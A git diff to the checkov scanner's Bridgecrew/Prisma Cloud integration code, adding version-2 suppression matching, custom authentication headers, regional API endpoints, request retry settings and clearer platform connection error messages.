+    def _check_suppressions(self, record: Record, suppressions: Optional[list[dict[str, Any]]], suppressions_v2: Optional[list[dict[str, Any]]]) -> dict[str, Any] | None:
         """
-        Checks the specified suppressions against the specified record, returning the first applicable suppression,
-        or None of no suppression is applicable.
-        :param record:
-        :param suppressions:
+        Checks the specified suppressions against the specified record, returning the applied suppression, if any, else None
         :return:
         """
-        for suppression in suppressions:
-            if self._check_suppression(record, suppression):
-                return suppression
+        if suppressions:
+            for suppression in suppressions:
+                if self._check_suppression(record, suppression):
+                    return suppression
+        if suppressions_v2:
+            for suppression in suppressions_v2:
+                if self._check_suppression_v2(record, suppression):
+                    return suppression
         return None
 
     def _check_suppression(self, record: Record, suppression: dict[str, Any]) -> bool:
@@ -170,22 +219,64 @@ def _check_suppression(self, record: Record, suppression: dict[str, Any]) -> boo
                 return False
             if self.bc_integration.repo_id and self.bc_integration.source_id and self.bc_integration.source_id in suppression['accountIds']\
                     and suppression['cves']:
-                repo_name = self.bc_integration.repo_id.replace('\\', '/').split('/')[-1]
-                suppression_path = suppression['cves'][0]['id'].replace('\\', '/')
-                file_abs_path = record.file_abs_path.replace('\\', '/')
+                repo_name = align_path(self.bc_integration.repo_id).split('/')[-1]
+                suppression_path = self._get_cve_suppression_path(suppression)
+                repo_file_path = align_path(record.repo_file_path)
+                file_abs_path = align_path(record.file_abs_path)
                 if file_abs_path == suppression_path[1:] or \
                         file_abs_path == suppression_path or \
-                        file_abs_path.endswith("".join([repo_name, suppression_path])):
+                        file_abs_path.endswith("".join([repo_name, suppression_path])) or \
+                        removeprefix(repo_file_path, '/') == removeprefix(suppression_path, '/'):
                     return any(record.vulnerability_details and record.vulnerability_details['id'] == cve['cve']
                                for cve in suppression['cves'])
             return False
 
         elif type == 'LicenseType':
             return any(record.vulnerability_details and record.vulnerability_details['license'] == license_type
-                       for license_type in suppression['licenseTypes'])
+                       for license_type in suppression.get('licenseTypes', []))
 
         return False
 
+    @staticmethod
+    def normalize_file_path(file_path: str) -> str:
+        """
+        Returns the file path with a leading slash, if not already present
+        """
+        return file_path if file_path.startswith('/') else f'/{file_path}'
+
+    def _check_suppression_v2_file(self, record_file_path: str, suppression_file_path: str, suppression_repo_name: str) -> bool:
+        return self.bc_integration.repo_matches(suppression_repo_name)\
+            and (suppression_file_path == record_file_path or suppression_file_path == convert_to_unix_path(record_file_path))
+
+    def _check_suppression_v2(self, record: Record, suppression: dict[str, Any]) -> bool:
+        if record.check_id not in suppression['checkovPolicyIds']:
+            return False
+
+        type = suppression['ruleType']
+
+        if type == 'policy':
+            # We just checked the policy ID above
+            return True
+        elif type == 'finding':
+            pass  # TODO how to map them?
+        elif type == 'file':
+            record_file_path = SuppressionsIntegration.normalize_file_path(record.repo_file_path)
+            for file_suppression in suppression['files']:
+                suppression_file_path = SuppressionsIntegration.normalize_file_path(file_suppression['filePath'])
+                if self._check_suppression_v2_file(record_file_path, suppression_file_path, file_suppression.get('repositoryName', '')):
+                    return True
+        elif type == 'repository':
+            return any(self.bc_integration.repo_matches(repo.get('repositoryName', '')) for repo in suppression['repositories'])
+        return False
+
+    def _get_cve_suppression_path(self, suppression: dict[str, Any]) -> str:
+        suppression_path: str = align_path(suppression['cves'][0]['id'])
+        # for handling cases of IR/docker (e.g: '/Dockerfile:/DockerFile.FROM)
+        suppression_path_parts = suppression_path.split(':')
+        if len(suppression_path_parts) == 2 and suppression_path_parts[1].startswith(suppression_path_parts[0]):
+            return suppression_path_parts[0]
+        return suppression_path
+
     def _suppression_valid_for_run(self, suppression: dict[str, Any]) -> bool:
         """
         Returns whether this suppression is valid. A suppression is NOT valid if:
@@ -220,13 +311,12 @@ def pre_runner(self, runner: _BaseRunner) -> None:
         # not used
         pass
 
-    def get_policy_level_suppressions(self) -> dict[str, str]:
+    def get_policy_level_suppressions(self) -> dict[str, list[str]]:
         policy_level_suppressions = {}
-        for check_suppressions in self.suppressions.values():
+        for check_suppressions in itertools.chain(self.suppressions.values(), self.suppressions_v2.values()):
             for suppression in check_suppressions:
-                if suppression.get("suppressionType") == "Policy":
-                    policy_level_suppressions[suppression['id']] = suppression['policyId']
-                    break
+                if (suppression['isV1'] and suppression.get("suppressionType") == "Policy") or (not suppression['isV1'] and suppression.get("ruleType") == "policy"):
+                    policy_level_suppressions[suppression['id']] = [suppression['policyId']] if suppression['isV1'] else suppression['policyIds']
         return policy_level_suppressions
 
     def post_scan(self, merged_reports: list[Report]) -> None:
diff --git a/checkov/common/bridgecrew/platform_errors.py b/checkov/common/bridgecrew/platform_errors.py
index 6afb04129de..e5c3031ae93 100644
--- a/checkov/common/bridgecrew/platform_errors.py
+++ b/checkov/common/bridgecrew/platform_errors.py
@@ -1,9 +1,18 @@
-class BridgecrewAuthError(Exception):
-    def __init__(self, message: str = "Authorization error accessing Bridgecrew.cloud api. Please check bc-api-key") -> None:
+class PlatformConnectionError(Exception):
+    def __init__(self, message: str) -> None:
+        self.message = message
+
+    def __str__(self) -> str:
+        return f"PlatformConnectionError: {self.message}"
+
+
+class BridgecrewAuthError(PlatformConnectionError):
+    def __init__(self, message: str = "Authorization error accessing the platform api. Please check your API keys and "
+                                      "Prisma API URL.") -> None:
         self.message = message
 
     def __str__(self) -> str:
-        return f"BCAuthError, {self.message} "
+        return f"BCAuthError: {self.message}"
 
 
 class ModuleNotEnabledError(Exception):
@@ -11,4 +20,4 @@ def __init__(self, message: str) -> None:
         self.message = message
 
     def __str__(self) -> str:
-        return f"ModuleNotEnabledError, {self.message} "
+        return f"ModuleNotEnabledError: {self.message}"
diff --git a/checkov/common/bridgecrew/platform_integration.py b/checkov/common/bridgecrew/platform_integration.py
index b528f16af61..ca954e5f401 100644
--- a/checkov/common/bridgecrew/platform_integration.py
+++ b/checkov/common/bridgecrew/platform_integration.py
@@ -19,6 +19,7 @@
 import boto3
 import dpath
 import urllib3
+import urllib.parse
 from botocore.config import Config
 from botocore.exceptions import ClientError
 from cachetools import cached, TTLCache
@@ -28,19 +29,19 @@
 from urllib3.exceptions import HTTPError, MaxRetryError
 
 from checkov.common.bridgecrew.check_type import CheckType
-from checkov.common.bridgecrew.platform_errors import BridgecrewAuthError
+from checkov.common.bridgecrew.platform_errors import BridgecrewAuthError, PlatformConnectionError
 from checkov.common.bridgecrew.platform_key import read_key
 from checkov.common.bridgecrew.run_metadata.registry import registry
-from checkov.common.bridgecrew.wrapper import CDK_FRAMEWORK_PREFIX, persist_assets_results, reduce_scan_reports, \
+from checkov.common.bridgecrew.wrapper import persist_assets_results, reduce_scan_reports, \
     persist_checks_results, \
     enrich_and_persist_checks_metadata, checkov_results_prefix, persist_run_metadata, _put_json_object, \
     persist_graphs, persist_resource_subgraph_maps, persist_reachability_results, \
     persist_multiple_logs_stream
 from checkov.common.models.consts import SAST_SUPPORTED_FILE_EXTENSIONS, SUPPORTED_FILE_EXTENSIONS, SUPPORTED_FILES, SCANNABLE_PACKAGE_FILES
 from checkov.common.runners.base_runner import filter_ignored_paths
-from checkov.common.sast.consts import SastLanguages
+from checkov.common.sast.consts import SastLanguages, CDK_FRAMEWORK_PREFIX
 from checkov.common.typing import _CicdDetails, LibraryGraph
-from checkov.common.util.consts import PRISMA_PLATFORM, BRIDGECREW_PLATFORM, CHECKOV_RUN_SCA_PACKAGE_SCAN_V2
+from checkov.common.util.consts import PRISMA_PLATFORM, BRIDGECREW_PLATFORM
 from checkov.common.util.data_structures_utils import merge_dicts
 from checkov.common.util.dockerfile import is_dockerfile
 from checkov.common.util.http_utils import (
@@ -57,7 +58,7 @@
     REQUEST_READ_TIMEOUT,
     REQUEST_RETRIES,
 )
-from checkov.common.util.type_forcers import convert_prisma_policy_filter_to_dict, convert_str_to_bool
+from checkov.common.util.type_forcers import convert_prisma_policy_filter_to_params, convert_str_to_bool
 from checkov.version import version as checkov_version
 
 if TYPE_CHECKING:
@@ -67,7 +68,7 @@
     from checkov.secrets.coordinator import EnrichedSecret
     from mypy_boto3_s3.client import S3Client
     from typing_extensions import TypeGuard
-    from checkov.common.sast.report_types import Match
+    from checkov.common.sast.report_types import Match, SkippedCheck
 
 SLEEP_SECONDS = 1
 
@@ -85,12 +86,26 @@
 FileToPersist = namedtuple('FileToPersist', 'full_file_path s3_file_key')
 
 DEFAULT_REGION = "us-west-2"
-GOV_CLOUD_REGION = 'us-gov-west-1'
 PRISMA_GOV_API_URL = 'https://api.gov.prismacloud.io'
+JAKARTA_API_URL = 'https://api.id.prismacloud.io'
+
+API_URL_REGION_MAP = {
+    PRISMA_GOV_API_URL: 'us-gov-west-1',
+    JAKARTA_API_URL: 'ap-southeast-3'
+}
+
+REGIONS_URL_NOT_SUPPORT_S3_ACCELERATE = {
+    PRISMA_GOV_API_URL,
+    JAKARTA_API_URL
+}
+
 MAX_RETRIES = 40
 
 CI_METADATA_EXTRACTOR = registry.get_extractor()
 
+REQUEST_STATUS_CODES_RETRY = [401, 408, 500, 502, 503, 504]
+REQUEST_METHODS_TO_RETRY = ['DELETE', 'GET', 'HEAD', 'OPTIONS', 'PUT', 'TRACE', 'POST']
+
 
 class BcPlatformIntegration:
     def __init__(self) -> None:
@@ -114,20 +129,28 @@ def clean(self) -> None:
         self.timestamp: str | None = None
         self.scan_reports: list[Report] = []
         self.bc_api_url = normalize_bc_url(os.getenv('BC_API_URL'))
-        self.prisma_api_url = normalize_prisma_url(os.getenv('PRISMA_API_URL', 'https://api0.prismacloud.io'))
+        self.prisma_api_url = normalize_prisma_url(os.getenv('PRISMA_API_URL') or 'https://api0.prismacloud.io')
         self.prisma_policies_url: str | None = None
         self.prisma_policy_filters_url: str | None = None
+        self.custom_auth_headers: dict[str, str] = {}
+        self.custom_auth_token: str | None = None
         self.setup_api_urls()
         self.customer_run_config_response = None
         self.runtime_run_config_response = None
-        self.prisma_policies_response = None
+        self.prisma_policies_response: dict[str, str] | None = None
+        self.prisma_policies_exception_response: dict[str, str] | None = None
         self.public_metadata_response = None
         self.use_s3_integration = False
         self.s3_setup_failed = False
         self.platform_integration_configured = False
         self.http: urllib3.PoolManager | urllib3.ProxyManager | None = None
         self.http_timeout = urllib3.Timeout(connect=REQUEST_CONNECT_TIMEOUT, read=REQUEST_READ_TIMEOUT)
-        self.http_retry = urllib3.Retry(REQUEST_RETRIES, redirect=3)
+        self.http_retry = urllib3.Retry(
+            REQUEST_RETRIES,
+            redirect=3,
+            status_forcelist=REQUEST_STATUS_CODES_RETRY,
+            allowed_methods=REQUEST_METHODS_TO_RETRY
+        )
         self.bc_skip_mapping = False
         self.cicd_details: _CicdDetails = {}
         self.support_flag_enabled = False
@@ -139,6 +162,7 @@ def clean(self) -> None:
         self.daemon_process = False  # set to 'True' when running in multiprocessing 'spawn' mode
         self.scan_dir: List[str] = []
         self.scan_file: List[str] = []
+        self.sast_custom_policies: str = ''
 
     def init_instance(self, platform_integration_data: dict[str, Any]) -> None:
         """This is mainly used for recreating the instance without interacting with the platform again"""
@@ -153,7 +177,9 @@ def init_instance(self, platform_integration_data: dict[str, Any]) -> None:
         self.cicd_details = platform_integration_data["cicd_details"]
         self.credentials = platform_integration_data["credentials"]
         self.platform_integration_configured = platform_integration_data["platform_integration_configured"]
-        self.prisma_api_url = platform_integration_data["prisma_api_url"]
+        self.prisma_api_url = platform_integration_data.get("prisma_api_url", 'https://api0.prismacloud.io')
+        self.custom_auth_headers = platform_integration_data["custom_auth_headers"]
+        self.custom_auth_token = platform_integration_data["custom_auth_token"]
         self.repo_branch = platform_integration_data["repo_branch"]
         self.repo_id = platform_integration_data["repo_id"]
         self.repo_path = platform_integration_data["repo_path"]
@@ -178,6 +204,7 @@ def generate_instance_data(self) -> dict[str, Any]:
             "credentials": self.credentials,
             "platform_integration_configured": self.platform_integration_configured,
             "prisma_api_url": self.prisma_api_url,
+            "custom_auth_headers": self.custom_auth_headers,
             "repo_branch": self.repo_branch,
             "repo_id": self.repo_id,
             "repo_path": self.repo_path,
@@ -214,7 +241,7 @@ def setup_api_urls(self) -> None:
         self.runtime_run_config_url = f"{self.api_url}/api/v1/runtime-images/repositories"
 
     def is_prisma_integration(self) -> bool:
-        if self.bc_api_key and not self.is_bc_token(self.bc_api_key):
+        if (self.bc_api_key and not self.is_bc_token(self.bc_api_key)) or self.custom_auth_token:
             return True
         return False
 
@@ -253,6 +280,8 @@ def is_bc_token(token: str | None) -> TypeGuard[str]:
     def get_auth_token(self) -> str:
         if self.is_bc_token(self.bc_api_key):
             return self.bc_api_key
+        if self.custom_auth_token:
+            return self.custom_auth_token
         # A Prisma Cloud Access Key was specified as the Bridgecrew token.
         if not self.prisma_api_url:
             raise ValueError("A Prisma Cloud token was set, but no Prisma Cloud API URL was set")
@@ -373,6 +402,17 @@ def setup_bridgecrew_credentials(
 
         self.platform_integration_configured = True
 
+    def _get_source_id_from_repo_path(self, repo_path: str) -> str | None:
+        repo_path_parts = repo_path.split("/")
+        if not repo_path_parts and repo_path_parts[0] != 'checkov':
+            logging.error(f'failed to get source_id from repo_path. repo_path format is unknown: ${repo_path}')
+            return None
+        try:
+            return '/'.join(repo_path_parts[2:4])
+        except IndexError:
+            logging.error(f'failed to get source_id from repo_path. repo_path format is unknown: ${repo_path}')
+            return None
+
     def set_s3_integration(self) -> None:
         try:
             self.skip_fixes = True  # no need to run fixes on CI integration
@@ -381,7 +421,7 @@ def set_s3_integration(self) -> None:
                 return
 
             self.bucket, self.repo_path = repo_full_path.split("/", 1)
-
+            self.source_id = self._get_source_id_from_repo_path(self.repo_path)
             self.timestamp = self.repo_path.split("/")[-2]
             self.credentials = cast("dict[str, str]", response["creds"])
 
@@ -392,18 +432,35 @@ def set_s3_integration(self) -> None:
 
             self.use_s3_integration = True
             self.platform_integration_configured = True
-        except MaxRetryError:
-            logging.error("An SSL error occurred connecting to the platform. If you are on a VPN, please try "
-                          "disabling it and re-running the command.", exc_info=True)
-            raise
-        except HTTPError:
-            logging.error("Failed to get customer assumed role", exc_info=True)
-            raise
-        except JSONDecodeError:
-            logging.error(f"Response of {self.integrations_api_url} is not a valid JSON", exc_info=True)
-            raise
+        except MaxRetryError as e:
+            # almost all failures should be caught by this block - we need to differentiate what actually happened
+            # for the causes that are almost certainly user error, we want to hide the exception details
+            # so that it does not look like checkov crashed due to a bug (stack traces are scary for users)
+            if str(e.reason) == 'too many 401 error responses':
+                logging.error('An authentication error occurred connecting to the platform after multiple retries. '
+                              'Please verify that your API key and Prisma API URL are correct, and retry.')
+            elif isinstance(e.reason, urllib3.exceptions.SSLError):
+                logging.error("An SSL error occurred connecting to the platform. If you are on a VPN, please try "
+                              f"disabling it and re-running the command. The error is: {e.reason}")
+            else:
+                logging.error('An error occurred connecting to the platform after multiple retries. Please verify your '
+                              'API key and Prisma API URL, as well as network connectivity, and retry. If the problem '
+                              'persists, please enable debug logs and contact support.')
+            logging.debug('The exception details:', exc_info=True)
+            raise PlatformConnectionError(str(e.reason)) from e
+        except HTTPError as e:
+            logging.error('An unexpected error occurred connecting to the platform. Please verify your '
+                          'API key and Prisma API URL, as well as network connectivity, and retry. If the problem '
+                          'persists, please enable debug logs and contact support.', exc_info=True)
+            raise PlatformConnectionError(str(e)) from e
+        except JSONDecodeError as e:
+            logging.error('An unexpected error occurred processing the response from the platform. Please verify your '
+                          'API key and Prisma API URL, as well as network connectivity, and retry. If the problem '
+                          'persists, please enable debug logs and contact support.', exc_info=True)
+            raise PlatformConnectionError(str(e)) from e
         except BridgecrewAuthError:
-            logging.error("Received an error response during authentication")
+            logging.error('An authentication error occurred connecting to the platform after multiple retries. '
+                          'Please verify that your API keys and Prisma API URL are correct, and retry.')
             raise
 
     def set_s3_client(self) -> None:
@@ -412,9 +469,10 @@ def set_s3_client(self) -> None:
 
         region = DEFAULT_REGION
         use_accelerate_endpoint = True
-        if self.prisma_api_url == PRISMA_GOV_API_URL:
-            region = GOV_CLOUD_REGION
+
+        if self.prisma_api_url in REGIONS_URL_NOT_SUPPORT_S3_ACCELERATE:
             use_accelerate_endpoint = False
+            region = API_URL_REGION_MAP[self.prisma_api_url]
 
         try:
             config = Config(
@@ -470,7 +528,8 @@ def _get_s3_creds(self, repo_id: str, token: str) -> dict[str, Any]:
         request = self.http.request("POST", self.integrations_api_url,  # type:ignore[union-attr]
                                     body=json.dumps({"repoId": repo_id, "support": self.support_flag_enabled}),
                                     headers=merge_dicts({"Authorization": token, "Content-Type": "application/json"},
-                                                        get_user_agent_header()))
+                                                        get_user_agent_header(),
+                                                        self.custom_auth_headers))
         logging.debug(f'Request ID: {request.headers.get("x-amzn-requestid")}')
         logging.debug(f'Trace ID: {request.headers.get("x-amzn-trace-id")}')
         if request.status == 403:
@@ -511,7 +570,7 @@ def persist_repository(
             for f in files:
                 f_name = os.path.basename(f)
                 _, file_extension = os.path.splitext(f)
-                if CHECKOV_RUN_SCA_PACKAGE_SCAN_V2 and file_extension in SCANNABLE_PACKAGE_FILES:
+                if file_extension in SCANNABLE_PACKAGE_FILES:
                     continue
                 if file_extension in SUPPORTED_FILE_EXTENSIONS or f_name in SUPPORTED_FILES:
                     files_to_persist.append(FileToPersist(f, os.path.relpath(f, root_dir)))
@@ -529,7 +588,7 @@ def persist_repository(
                 filter_ignored_paths(root_path, f_names, excluded_paths)
                 for file_path in f_names:
                     _, file_extension = os.path.splitext(file_path)
-                    if CHECKOV_RUN_SCA_PACKAGE_SCAN_V2 and file_extension in SCANNABLE_PACKAGE_FILES:
+                    if file_extension in SCANNABLE_PACKAGE_FILES:
                         continue
                     full_file_path = os.path.join(root_path, file_path)
                     relative_file_path = os.path.relpath(full_file_path, root_dir)
@@ -592,6 +651,23 @@ def adjust_sast_match_location_path(self, match: Match) -> None:
 
                 return
 
+    def adjust_sast_skipped_checks_path(self, skipped_checks_by_file: Dict[str, List[SkippedCheck]]) -> None:
+        for filepath in list(skipped_checks_by_file.keys()):
+            new_filepath = None
+            for dir in self.scan_dir:
+                if filepath.startswith(os.path.abspath(dir)):
+                    file_dir = '/'.join(filepath.split('/')[0:-1])
+                    new_filepath = filepath.replace(os.path.abspath(file_dir), self.repo_path)  # type: ignore
+                    break
+            for file in self.scan_file:
+                if filepath == os.path.abspath(file):
+                    file_dir = '/'.join(filepath.split('/')[0:-1])
+                    new_filepath = filepath.replace(os.path.abspath(file_dir), self.repo_path)  # type: ignore
+                    break
+            if new_filepath:
+                skipped_checks_by_file[new_filepath] = skipped_checks_by_file[filepath]
+                skipped_checks_by_file.pop(filepath)
+
     @staticmethod
     def _delete_code_block_from_sast_report(report: Dict[str, Any]) -> None:
         if isinstance(report, dict):
@@ -613,15 +689,17 @@ def save_sast_report_locally(sast_scan_reports: Dict[str, Dict[str, Any]]) -> No
     def persist_sast_scan_results(self, reports: List[Report]) -> None:
         sast_scan_reports = {}
         for report in reports:
-            if not report.check_type.startswith('sast'):
+            if not report.check_type.lower().startswith(CheckType.SAST):
                 continue
-            if not report.sast_report:  # type: ignore
+            if not hasattr(report, 'sast_report') or not report.sast_report:
                 continue
-            for _, match_by_check in report.sast_report.rule_match.items():  # type: ignore
+            for _, match_by_check in report.sast_report.rule_match.items():
                 for _, match in match_by_check.items():
                     for m in match.matches:
                         self.adjust_sast_match_location_path(m)
-                sast_scan_reports[report.check_type] = report.sast_report.model_dump(mode='json')  # type: ignore
+                self.adjust_sast_skipped_checks_path(report.sast_report.skipped_checks_by_file)
+
+                sast_scan_reports[report.check_type] = report.sast_report.model_dump(mode='json')
             if self.on_prem:
                 BcPlatformIntegration._delete_code_block_from_sast_report(sast_scan_reports)
 
@@ -825,7 +903,8 @@ def commit_repository(self, branch: str) -> str | None:
                                                                  "Content-Type": "application/json",
                                                                  'x-api-client': self.bc_source.name,
                                                                  'x-api-checkov-version': checkov_version},
-                                                                get_user_agent_header()
+                                                                get_user_agent_header(),
+                                                                self.custom_auth_headers
                                                                 ))
                 response = json.loads(request.data.decode("utf8"))
                 logging.debug(f'Request ID: {request.headers.get("x-amzn-requestid")}')
@@ -888,11 +967,12 @@ def _persist_file(self, full_file_path: str, s3_file_key: str) -> None:
                     sleep(SLEEP_SECONDS)
                     curr_try += 1
                 else:
-                    logging.error(f"failed to persist file {full_file_path} into S3 bucket {self.bucket}",
-                                  exc_info=True)
+                    logging.error(f"failed to persist file {full_file_path} into S3 bucket {self.bucket}", exc_info=True)
+                    logging.debug(f"file size of {full_file_path} is {os.stat(full_file_path).st_size} bytes")
                     raise
             except Exception:
                 logging.error(f"failed to persist file {full_file_path} into S3 bucket {self.bucket}", exc_info=True)
+                logging.debug(f"file size of {full_file_path} is {os.stat(full_file_path).st_size} bytes")
                 raise
         if curr_try == tries:
             logging.error(
@@ -909,7 +989,8 @@ def get_platform_run_config(self) -> None:
             self.get_public_run_config()
 
     def _get_run_config_query_params(self) -> str:
-        return f'module={"bc" if self.is_bc_token(self.bc_api_key) else "pc"}&enforcementv2=true'
+        # ignore mypy warning that this can be null
+        return f'module={"bc" if self.is_bc_token(self.bc_api_key) else "pc"}&enforcementv2=true&repoId={urllib.parse.quote(self.repo_id)}'  # type: ignore
 
     def get_run_config_url(self) -> str:
         return f'{self.platform_run_config_url}?{self._get_run_config_query_params()}'
@@ -930,7 +1011,8 @@ def get_customer_run_config(self) -> None:
         try:
             token = self.get_auth_token()
             headers = merge_dicts(get_auth_header(token),
-                                  get_default_get_headers(self.bc_source, self.bc_source_version))
+                                  get_default_get_headers(self.bc_source, self.bc_source_version),
+                                  self.custom_auth_headers)
 
             self.setup_http_manager()
             if not self.http:
@@ -960,8 +1042,11 @@ def get_customer_run_config(self) -> None:
             self.customer_run_config_response = json.loads(request.data.decode("utf8"))
 
             logging.debug(f"Got customer run config from {platform_type} platform")
-        except Exception:
-            logging.warning(f"Failed to get the customer run config from {self.platform_run_config_url}", exc_info=True)
+        except Exception as e:
+            logging.warning(f"An unexpected error occurred getting the run configuration from {self.platform_run_config_url} "
+                            "after multiple retries. Please verify your API key and Prisma API URL, and retry. If the "
+                            "problem persists, please enable debug logs and contact support. The error is: "
+                            f"{e}", exc_info=True)
             raise
 
     def get_reachability_run_config(self) -> Union[Dict[str, Any], None]:
@@ -980,7 +1065,8 @@ def get_reachability_run_config(self) -> Union[Dict[str, Any], None]:
         try:
             token = self.get_auth_token()
             headers = merge_dicts(get_auth_header(token),
-                                  get_default_get_headers(self.bc_source, self.bc_source_version))
+                                  get_default_get_headers(self.bc_source, self.bc_source_version),
+                                  self.custom_auth_headers)
 
             self.setup_http_manager()
             if not self.http:
@@ -1021,7 +1107,8 @@ def get_runtime_run_config(self) -> None:
 
             token = self.get_auth_token()
             headers = merge_dicts(get_auth_header(token),
-                                  get_default_get_headers(self.bc_source, self.bc_source_version))
+                                  get_default_get_headers(self.bc_source, self.bc_source_version),
+                                  self.custom_auth_headers)
 
             self.setup_http_manager()
             if not self.http:
@@ -1043,17 +1130,18 @@ def get_runtime_run_config(self) -> None:
         except Exception:
             logging.debug('could not get runtime info for this repo')
 
-    def get_prisma_build_policies(self, policy_filter: str) -> None:
+    def get_prisma_build_policies(self, policy_filter: str, policy_filter_exception: str) -> None:
         """
         Get Prisma policy for enriching runConfig with metadata
         Filters: https://prisma.pan.dev/api/cloud/cspm/policy#operation/get-policy-filters-and-options
         :param policy_filter: comma separated filter string. Example, policy.label=A,cloud.type=aws
+        :param policy_filter_exception: comma separated filter string. Example, policy.label=A,cloud.type=aws
         :return:
         """
         if self.skip_download is True:
             logging.debug("Skipping prisma policy API call")
             return
-        if not policy_filter:
+        if not policy_filter and not policy_filter_exception:
             return
         if not self.is_prisma_integration():
             return
@@ -1061,44 +1149,58 @@ def get_prisma_build_policies(self, policy_filter: str) -> None:
             raise Exception(
                 "Tried to get prisma build policy metadata, "
                 "but the API key was missing or the integration was not set up")
+        self.prisma_policies_response = self.get_prisma_policies_for_filter(policy_filter)
+        self.prisma_policies_exception_response = self.get_prisma_policies_for_filter(policy_filter_exception)
 
+    def get_prisma_policies_for_filter(self, policy_filter: str) -> dict[Any, Any] | None:
         request = None
-
+        filtered_policies = None
         try:
             token = self.get_auth_token()
-            headers = merge_dicts(get_prisma_auth_header(token), get_prisma_get_headers())
+            headers = merge_dicts(get_prisma_auth_header(token), get_prisma_get_headers(), self.custom_auth_headers)
 
             self.setup_http_manager()
             if not self.http:
                 logging.error("HTTP manager was not correctly created")
-                return
+                return filtered_policies
 
             logging.debug(f'Prisma policy URL: {self.prisma_policies_url}')
-            query_params = convert_prisma_policy_filter_to_dict(policy_filter)
+            query_params = convert_prisma_policy_filter_to_params(policy_filter)
             if self.is_valid_policy_filter(query_params, valid_filters=self.get_prisma_policy_filters()):
                 # If enabled and subtype are not explicitly set, use the only acceptable values.
-                query_params['policy.enabled'] = True
-                query_params['policy.subtype'] = 'build'
+                self.add_static_policy_filters(query_params)
+                logging.debug(f'Filter query params: {query_params}')
+
                 request = self.http.request(  # type:ignore[no-untyped-call]
                     "GET",
                     self.prisma_policies_url,
                     headers=headers,
-                    fields=query_params,
+                    fields=tuple(query_params),
                 )
-                self.prisma_policies_response = json.loads(request.data.decode("utf8"))
                 logging.debug("Got Prisma build policy metadata")
-            else:
-                logging.warning("Skipping get prisma build policies. --policy-metadata-filter will not be applied.")
+                filtered_policies = json.loads(request.data.decode("utf8"))
         except Exception:
             response_message = f': {request.status} - {request.reason}' if request else ''
             logging.warning(
                 f"Failed to get prisma build policy metadata from {self.prisma_policies_url}{response_message}", exc_info=True)
+        return filtered_policies
+
+    @staticmethod
+    def add_static_policy_filters(query_params: list[tuple[str, str]]) -> list[tuple[str, str]]:
+        """
+        Adds policy.enabled = true, policy.subtype = build to the query params, if these are not already present. Modifies the list in place and also returns it.
+        """
+        if not any(p[0] == 'policy.enabled' for p in query_params):
+            query_params.append(('policy.enabled', 'true'))
+        if not any(p[0] == 'policy.subtype' for p in query_params):
+            query_params.append(('policy.subtype', 'build'))
+        return query_params
 
     def get_prisma_policy_filters(self) -> Dict[str, Dict[str, Any]]:
         request = None
         try:
             token = self.get_auth_token()
-            headers = merge_dicts(get_prisma_auth_header(token), get_prisma_get_headers())
+            headers = merge_dicts(get_prisma_auth_header(token), get_prisma_get_headers(), self.custom_auth_headers)
 
             self.setup_http_manager()
             if not self.http:
@@ -1121,7 +1223,7 @@ def get_prisma_policy_filters(self) -> Dict[str, Dict[str, Any]]:
             return {}
 
     @staticmethod
-    def is_valid_policy_filter(policy_filter: dict[str, str], valid_filters: dict[str, dict[str, Any]] | None = None) -> bool:
+    def is_valid_policy_filter(policy_filter: list[tuple[str, str]], valid_filters: dict[str, dict[str, Any]] | None = None) -> bool:
         """
         Validates only the filter names
         """
@@ -1131,7 +1233,7 @@ def is_valid_policy_filter(policy_filter: dict[str, str], valid_filters: dict[st
             return False
         if not valid_filters:
             return False
-        for filter_name, filter_value in policy_filter.items():
+        for filter_name, filter_value in policy_filter:
             if filter_name not in valid_filters.keys():
                 logging.warning(f"Invalid filter name: {filter_name}")
                 logging.warning(f"Available filter names: {', '.join(valid_filters.keys())}")
@@ -1144,7 +1246,7 @@ def is_valid_policy_filter(policy_filter: dict[str, str], valid_filters: dict[st
                 logging.warning(f"Filter value not allowed: {filter_value}")
                 logging.warning("Available options: True")
                 return False
-        logging.debug("--policy-metadata-filter is valid")
+        logging.debug("policy filter is valid")
         return True
 
     def get_public_run_config(self) -> None:
@@ -1292,10 +1394,12 @@ def get_default_headers(self, request_type: str) -> dict[str, Any]:
 
         if request_type.upper() == "GET":
             return merge_dicts(get_default_get_headers(self.bc_source, self.bc_source_version),
-                               {"Authorization": self.get_auth_token()})
+                               {"Authorization": self.get_auth_token()},
+                               self.custom_auth_headers)
         elif request_type.upper() == "POST":
             return merge_dicts(get_default_post_headers(self.bc_source, self.bc_source_version),
-                               {"Authorization": self.get_auth_token()})
+                               {"Authorization": self.get_auth_token()},
+                               self.custom_auth_headers)
 
         logging.info(f"Unsupported request {request_type}")
         return {}
@@ -1307,7 +1411,8 @@ def get_sso_prismacloud_url(self, report_url: str) -> str:
         url_saml_config = f"{bc_integration.prisma_api_url}/saml/config"
         token = self.get_auth_token()
         headers = merge_dicts(get_auth_header(token),
-                              get_default_get_headers(self.bc_source, self.bc_source_version))
+                              get_default_get_headers(self.bc_source, self.bc_source_version),
+                              bc_integration.custom_auth_headers)
 
         request = self.http.request("GET", url_saml_config, headers=headers, timeout=10)  # type:ignore[no-untyped-call]
         if request.status >= 300:
@@ -1324,6 +1429,12 @@ def get_sso_prismacloud_url(self, report_url: str) -> str:
             # If there are any query parameters, append them to the URI
             if parsed_url.query:
                 uri = f"{uri}?{parsed_url.query}"
+
+                # First encoding
+                encoded_uri = urllib.parse.quote(uri)
+
+                # Second encoding
+                uri = urllib.parse.quote(encoded_uri)
             # Check if the URL already contains GET parameters.
             if "?" in access_saml_url:
                 report_url = f"{access_saml_url}&{relay_state_param_name}={uri}"
diff --git a/checkov/common/bridgecrew/wrapper.py b/checkov/common/bridgecrew/wrapper.py
index 8b6e2d050a9..361d361969a 100644
--- a/checkov/common/bridgecrew/wrapper.py
+++ b/checkov/common/bridgecrew/wrapper.py
@@ -19,7 +19,7 @@
     DiGraph = str
     node_link_data = lambda G : {}
 
-
+from checkov.common.sast.consts import CDK_FRAMEWORK_PREFIX, SAST_FRAMEWORK_PREFIX
 from checkov.common.bridgecrew.check_type import CheckType
 from checkov.common.models.consts import SUPPORTED_FILE_EXTENSIONS
 from checkov.common.typing import _ReducedScanReport, LibraryGraph
@@ -41,9 +41,6 @@
 FILE_NAME_NETWORKX = 'graph_networkx.json'
 FILE_NAME_RUSTWORKX = 'graph_rustworkx.json'
 
-SAST_FRAMEWORK_PREFIX = 'sast'
-CDK_FRAMEWORK_PREFIX = 'cdk'
-
 
 def _is_scanned_file(file: str) -> bool:
     file_ending = os.path.splitext(file)[1]
